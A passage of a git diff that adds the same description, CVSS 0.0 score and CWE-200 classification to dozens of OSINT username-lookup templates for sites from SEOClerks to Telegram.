@@ id: seoclerks info: name: SEOClerks author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,seoclerks self-contained: true diff --git a/osint/setlistfm.yaml b/osint/setlistfm.yaml index e97a21eb3f..985448ed81 100644 --- a/osint/setlistfm.yaml +++ b/osint/setlistfm.yaml @@ -3,7 +3,12 @@ id: setlistfm info: name: setlist.fm author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-music,setlistfm self-contained: true diff --git a/osint/sexworker.yaml b/osint/sexworker.yaml index 6142b67ae3..5ac9d71aaa 100644 --- a/osint/sexworker.yaml +++ b/osint/sexworker.yaml @@ -3,7 +3,12 @@ id: sexworker info: name: Sexworker author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,sexworker self-contained: true diff --git a/osint/sfd.yaml b/osint/sfd.yaml index d254669f3d..d81d06a694 100644 --- a/osint/sfd.yaml +++ b/osint/sfd.yaml @@ -3,7 +3,12 @@ id: sfd info: name: SFD author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-health,sfd self-contained: true diff --git a/osint/shanii-writes.yaml b/osint/shanii-writes.yaml index 533d38e0ed..8c271256af 100644 --- a/osint/shanii-writes.yaml +++ b/osint/shanii-writes.yaml @@ -3,7 +3,12 @@ id: shanii-writes info: name: Shanii Writes author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,shanii-writes self-contained: true diff --git a/osint/shesfreaky.yaml b/osint/shesfreaky.yaml index f24ceb2354..89c0741285 100644 --- a/osint/shesfreaky.yaml +++ b/osint/shesfreaky.yaml @@ -3,7 +3,12 @@ id: shesfreaky info: name: Shesfreaky author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,shesfreaky self-contained: true diff --git a/osint/shopify.yaml b/osint/shopify.yaml index b8d8bf6806..dcfafec495 100644 --- a/osint/shopify.yaml +++ b/osint/shopify.yaml @@ -3,7 +3,12 @@ id: shopify info: name: shopify author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,shopify self-contained: true diff --git a/osint/shutterstock.yaml b/osint/shutterstock.yaml index b0c8e2f4ad..bea4b1c8c5 100644 --- a/osint/shutterstock.yaml +++ b/osint/shutterstock.yaml @@ -3,7 +3,12 @@ id: shutterstock info: name: shutterstock author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,shutterstock self-contained: true diff --git a/osint/skeb.yaml b/osint/skeb.yaml index 9ee51de9a0..6d0d7f36e0 100644 --- a/osint/skeb.yaml +++ b/osint/skeb.yaml @@ -3,7 +3,12 @@ id: skeb info: name: skeb author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-art,skeb self-contained: true diff --git a/osint/skyrock.yaml b/osint/skyrock.yaml index d144515d7c..8dbd882af1 100644 --- a/osint/skyrock.yaml +++ b/osint/skyrock.yaml @@ -3,7 +3,12 @@ id: skyrock info: name: Skyrock author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,skyrock self-contained: true diff --git a/osint/slackholes.yaml b/osint/slackholes.yaml index 8ae7cbc40f..e459faf163 100644 --- a/osint/slackholes.yaml +++ b/osint/slackholes.yaml @@ -3,7 +3,12 @@ id: slackholes info: name: SlackHoles author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,slackholes self-contained: true diff --git a/osint/slant.yaml b/osint/slant.yaml index c09d1efd4e..c537491b6b 100644 --- a/osint/slant.yaml +++ b/osint/slant.yaml @@ -3,7 +3,12 @@ id: slant info: name: slant author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,slant self-contained: true diff --git a/osint/slides.yaml b/osint/slides.yaml index 306a1ecacf..ee967cb456 100644 --- a/osint/slides.yaml +++ b/osint/slides.yaml @@ -3,7 +3,12 @@ id: slides info: name: slides author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,slides self-contained: true diff --git a/osint/slideshare.yaml b/osint/slideshare.yaml index 711ad27393..4541e07552 100644 --- a/osint/slideshare.yaml +++ b/osint/slideshare.yaml @@ -3,7 +3,12 @@ id: slideshare info: name: slideshare author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,slideshare self-contained: true diff --git a/osint/smashrun.yaml b/osint/smashrun.yaml index 3771874f7d..23dd436543 100644 --- a/osint/smashrun.yaml +++ b/osint/smashrun.yaml @@ -3,7 +3,12 @@ id: smashrun info: name: SmashRun author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-health,smashrun self-contained: true diff --git a/osint/smelsy.yaml b/osint/smelsy.yaml index b04872c213..0eb3c5b787 100644 --- a/osint/smelsy.yaml +++ b/osint/smelsy.yaml @@ -3,7 +3,12 @@ id: smelsy info: name: smelsy author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,smelsy self-contained: true diff --git a/osint/smugmug.yaml b/osint/smugmug.yaml index 7e94dd620c..d56956f2f8 100644 --- a/osint/smugmug.yaml +++ b/osint/smugmug.yaml @@ -3,7 +3,12 @@ id: smugmug info: name: SmugMug author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-images,smugmug self-contained: true diff --git a/osint/smule.yaml b/osint/smule.yaml index 415c96a072..872d5408b8 100644 --- a/osint/smule.yaml +++ b/osint/smule.yaml @@ -3,7 +3,12 @@ id: smule info: name: smule author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-music,smule self-contained: true diff --git a/osint/snapchat-stories.yaml b/osint/snapchat-stories.yaml index 78546e63c1..c04ed9d433 100644 --- a/osint/snapchat-stories.yaml +++ b/osint/snapchat-stories.yaml @@ -3,7 +3,12 @@ id: snapchat-stories info: name: Snapchat Stories author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,snapchat-stories self-contained: true diff --git a/osint/snapchat.yaml b/osint/snapchat.yaml index 16a7d716b2..ffaf8d2924 100644 --- a/osint/snapchat.yaml +++ b/osint/snapchat.yaml @@ -3,7 +3,12 @@ id: snapchat info: name: Snapchat author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,snapchat self-contained: true diff --git a/osint/snipfeed.yaml b/osint/snipfeed.yaml index 3dc71447b0..4874f794fa 100644 --- a/osint/snipfeed.yaml +++ b/osint/snipfeed.yaml @@ -3,7 +3,12 @@ id: snipfeed info: name: Snipfeed author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,snipfeed self-contained: true diff --git a/osint/soccitizen4eu.yaml b/osint/soccitizen4eu.yaml index e081034188..87253e0f55 100644 --- a/osint/soccitizen4eu.yaml +++ b/osint/soccitizen4eu.yaml @@ -3,7 +3,12 @@ id: soccitizen4eu info: name: soc.citizen4.eu author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,soccitizen4eu self-contained: true diff --git a/osint/social-msdn.yaml b/osint/social-msdn.yaml index 0c54fd97ad..fa2cf71b21 100644 --- a/osint/social-msdn.yaml +++ b/osint/social-msdn.yaml @@ -3,7 +3,12 @@ id: social-msdn info: name: social_msdn author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,social-msdn self-contained: true diff --git a/osint/socialbundde.yaml b/osint/socialbundde.yaml index 9a66ecdb16..7438704a7a 100644 --- a/osint/socialbundde.yaml +++ b/osint/socialbundde.yaml @@ -3,7 +3,12 @@ id: socialbundde info: name: social.bund.de author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,socialbundde self-contained: true diff --git a/osint/sofurry.yaml b/osint/sofurry.yaml index e441d1bdf3..2f10805a81 100644 --- a/osint/sofurry.yaml +++ b/osint/sofurry.yaml @@ -3,7 +3,12 @@ id: sofurry info: name: sofurry author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-art,sofurry self-contained: true diff --git a/osint/solikick.yaml b/osint/solikick.yaml index b298a5a368..d279b291e9 100644 --- a/osint/solikick.yaml +++ b/osint/solikick.yaml @@ -3,7 +3,12 @@ id: solikick info: name: SoliKick author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,solikick self-contained: true diff --git a/osint/soloby.yaml b/osint/soloby.yaml index 1c13d0a5f0..47587ecfad 100644 --- a/osint/soloby.yaml +++ b/osint/soloby.yaml @@ -3,7 +3,12 @@ id: soloby info: name: soloby author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,soloby self-contained: true diff --git a/osint/soloto.yaml b/osint/soloto.yaml index 698dd61e71..c575b2684c 100644 --- a/osint/soloto.yaml +++ b/osint/soloto.yaml @@ -3,7 +3,12 @@ id: soloto info: name: solo.to author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,soloto self-contained: true diff --git a/osint/soundcloud.yaml b/osint/soundcloud.yaml index 4cd0957f7c..4389e527b9 100644 --- a/osint/soundcloud.yaml +++ b/osint/soundcloud.yaml @@ -3,7 +3,12 @@ id: soundcloud info: name: SoundCloud author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-music,soundcloud self-contained: true diff --git a/osint/soup.yaml b/osint/soup.yaml index 47808872da..d07351d7f7 100644 --- a/osint/soup.yaml +++ b/osint/soup.yaml @@ -3,7 +3,12 @@ id: soup info: name: Soup author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-blog,soup self-contained: true diff --git a/osint/sourceforge.yaml b/osint/sourceforge.yaml index 66b9b7e7ca..f1e9cd474e 100644 --- a/osint/sourceforge.yaml +++ b/osint/sourceforge.yaml @@ -3,7 +3,12 @@ id: sourceforge info: name: Sourceforge author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,sourceforge self-contained: true diff --git a/osint/speaker-deck.yaml b/osint/speaker-deck.yaml index 31ea98f371..91f9a86e05 100644 --- a/osint/speaker-deck.yaml +++ b/osint/speaker-deck.yaml @@ -3,7 +3,12 @@ id: speaker-deck info: name: Speaker Deck author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,speaker-deck self-contained: true diff --git a/osint/speedrun.yaml b/osint/speedrun.yaml index 19bb1a10d7..511501fe38 100644 --- a/osint/speedrun.yaml +++ b/osint/speedrun.yaml @@ -3,7 +3,12 @@ id: speedrun info: name: speedrun author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,speedrun self-contained: true diff --git a/osint/spiceworks.yaml b/osint/spiceworks.yaml index 8f732d3d6f..5ed947379f 100644 --- a/osint/spiceworks.yaml +++ b/osint/spiceworks.yaml @@ -3,7 +3,12 @@ id: spiceworks info: name: SpiceWorks author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,spiceworks self-contained: true diff --git a/osint/sporcle.yaml b/osint/sporcle.yaml index a9f22beded..fe4dfcef92 100644 --- a/osint/sporcle.yaml +++ b/osint/sporcle.yaml @@ -3,7 +3,12 @@ id: sporcle info: name: sporcle author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,sporcle self-contained: true diff --git a/osint/spotify.yaml b/osint/spotify.yaml index 4b73f863ae..9df057f5fb 100644 --- a/osint/spotify.yaml +++ b/osint/spotify.yaml @@ -3,7 +3,12 @@ id: spotify info: name: Spotify author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-music,spotify self-contained: true diff --git a/osint/steam.yaml b/osint/steam.yaml index a34e85911a..5475901414 100644 --- a/osint/steam.yaml +++ b/osint/steam.yaml @@ -3,7 +3,12 @@ id: steam info: name: Steam author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-gaming,steam self-contained: true diff --git a/osint/steemit.yaml b/osint/steemit.yaml index 193c50fd61..0d4e1927c2 100644 --- a/osint/steemit.yaml +++ b/osint/steemit.yaml @@ -3,7 +3,12 @@ id: steemit info: name: steemit author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,steemit self-contained: true diff --git a/osint/steller.yaml b/osint/steller.yaml index ae8ace1c88..072ee14969 100644 --- a/osint/steller.yaml +++ b/osint/steller.yaml @@ -3,7 +3,12 @@ id: steller info: name: steller author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-shopping,steller self-contained: true diff --git a/osint/stonerssocial-mastodon-instance.yaml b/osint/stonerssocial-mastodon-instance.yaml index 5bae60764c..24461f7937 100644 --- a/osint/stonerssocial-mastodon-instance.yaml +++ b/osint/stonerssocial-mastodon-instance.yaml @@ -3,7 +3,12 @@ id: stonerssocial-mastodon-instance info: name: Stoners.social (Mastodon Instance) author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,stonerssocial-mastodon-instance self-contained: true diff --git a/osint/storycorps.yaml b/osint/storycorps.yaml index 0fbc64d03e..d312a8f100 100644 --- a/osint/storycorps.yaml +++ b/osint/storycorps.yaml @@ -3,7 +3,12 @@ id: storycorps info: name: StoryCorps author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-blog,storycorps self-contained: true diff --git a/osint/streamelements.yaml b/osint/streamelements.yaml index 68cd6982b8..525b15e81a 100644 --- a/osint/streamelements.yaml +++ b/osint/streamelements.yaml @@ -3,7 +3,12 @@ id: streamelements info: name: StreamElements author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,streamelements self-contained: true diff --git a/osint/streamlabs.yaml b/osint/streamlabs.yaml index b728de1b7f..d35eb8831a 100644 --- a/osint/streamlabs.yaml +++ b/osint/streamlabs.yaml @@ -3,7 +3,12 @@ id: streamlabs info: name: StreamLabs author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-finance,streamlabs self-contained: true diff --git a/osint/stripchat.yaml b/osint/stripchat.yaml index a52014157c..bcd27c927c 100644 --- a/osint/stripchat.yaml +++ b/osint/stripchat.yaml @@ -3,7 +3,12 @@ id: stripchat info: name: Stripchat author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,stripchat self-contained: true diff --git a/osint/subscribestar.yaml b/osint/subscribestar.yaml index e151758d4e..1b94a8074c 100644 --- a/osint/subscribestar.yaml +++ b/osint/subscribestar.yaml @@ -3,7 +3,12 @@ id: subscribestar info: name: Subscribestar author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,subscribestar self-contained: true diff --git a/osint/sukebeinyaasi.yaml b/osint/sukebeinyaasi.yaml index f06464feb8..895eda6241 100644 --- a/osint/sukebeinyaasi.yaml +++ b/osint/sukebeinyaasi.yaml @@ -3,7 +3,12 @@ id: sukebeinyaasi info: name: sukebei.nyaa.si author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-video,sukebeinyaasi self-contained: true diff --git a/osint/suzuri.yaml b/osint/suzuri.yaml index 70b50427cb..b7a08330d0 100644 --- a/osint/suzuri.yaml +++ b/osint/suzuri.yaml @@ -3,7 +3,12 @@ id: suzuri info: name: Suzuri author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-business,suzuri self-contained: true diff --git a/osint/szmerinfo.yaml b/osint/szmerinfo.yaml index 6e8dad71d0..9b59a3bd0b 100644 --- a/osint/szmerinfo.yaml +++ b/osint/szmerinfo.yaml @@ -3,7 +3,12 @@ id: szmerinfo info: name: szmer.info author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,szmerinfo self-contained: true diff --git a/osint/tabletoptournament.yaml b/osint/tabletoptournament.yaml index 5e83d22d23..e768d906e3 100644 --- a/osint/tabletoptournament.yaml +++ b/osint/tabletoptournament.yaml @@ -3,7 +3,12 @@ id: tabletoptournament info: name: tabletoptournament author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-misc,tabletoptournament self-contained: true diff --git a/osint/tagged.yaml b/osint/tagged.yaml index 10b2624a92..16d54e7886 100644 --- a/osint/tagged.yaml +++ b/osint/tagged.yaml @@ -3,7 +3,12 @@ id: tagged info: name: Tagged author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,tagged self-contained: true diff --git a/osint/tamtam.yaml b/osint/tamtam.yaml index 100c579fd4..4058808b2e 100644 --- a/osint/tamtam.yaml +++ b/osint/tamtam.yaml @@ -3,7 +3,12 @@ id: tamtam info: name: TamTam author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,tamtam self-contained: true diff --git a/osint/tanukipl.yaml b/osint/tanukipl.yaml index b6174e198f..4bd59c4a9c 100644 --- a/osint/tanukipl.yaml +++ b/osint/tanukipl.yaml @@ -3,7 +3,12 @@ id: tanukipl info: name: Tanuki.pl author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-hobby,tanukipl self-contained: true diff --git a/osint/tapitag.yaml b/osint/tapitag.yaml index 1961c8c030..e243293105 100644 --- a/osint/tapitag.yaml +++ b/osint/tapitag.yaml @@ -3,7 +3,12 @@ id: tapitag info: name: TAPiTAG author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-business,tapitag self-contained: true diff --git a/osint/tappy.yaml b/osint/tappy.yaml index 1a231cd48d..9132e38f76 100644 --- a/osint/tappy.yaml +++ b/osint/tappy.yaml @@ -3,7 +3,12 @@ id: tappy info: name: Tappy author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-business,tappy self-contained: true diff --git a/osint/taringa.yaml b/osint/taringa.yaml index 2e82752b5c..a97caaec00 100644 --- a/osint/taringa.yaml +++ b/osint/taringa.yaml @@ -3,7 +3,12 @@ id: taringa info: name: Taringa author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-social,taringa self-contained: true diff --git a/osint/taskrabbit.yaml b/osint/taskrabbit.yaml index 60bfab82c7..4549a5c427 100644 --- a/osint/taskrabbit.yaml +++ b/osint/taskrabbit.yaml @@ -3,7 +3,12 @@ id: taskrabbit info: name: taskrabbit author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-business,taskrabbit self-contained: true diff --git a/osint/teamtreehouse.yaml b/osint/teamtreehouse.yaml index d287504c5c..776627dead 100644 --- a/osint/teamtreehouse.yaml +++ b/osint/teamtreehouse.yaml @@ -3,7 +3,12 @@ id: teamtreehouse info: name: Teamtreehouse author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-coding,teamtreehouse self-contained: true diff --git a/osint/teddygirls.yaml b/osint/teddygirls.yaml index 4ec85d1d44..6fbbd3f18e 100644 --- a/osint/teddygirls.yaml +++ b/osint/teddygirls.yaml @@ -3,7 +3,12 @@ id: teddygirls info: name: Teddygirls author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-porn,teddygirls self-contained: true diff --git a/osint/teespring.yaml b/osint/teespring.yaml index 8e25cfc6d4..b128e52781 100644 --- a/osint/teespring.yaml +++ b/osint/teespring.yaml @@ -3,7 +3,12 @@ id: teespring info: name: Teespring author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-business,teespring self-contained: true diff --git a/osint/teknik.yaml b/osint/teknik.yaml index c11b584a1d..cccd221420 100644 --- a/osint/teknik.yaml +++ b/osint/teknik.yaml @@ -3,7 +3,12 @@ id: teknik info: name: Teknik author: dwisiswant0 + description: This OSINT template looks for information about a user name. severity: info + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: osint,osint-tech,teknik self-contained: true diff --git a/osint/telegram.yaml b/osint/telegram.yaml index e730fee163..ea6daf5b8a 100644 --- a/osint/telegram.yaml +++ b/osint/telegram.yaml @@ 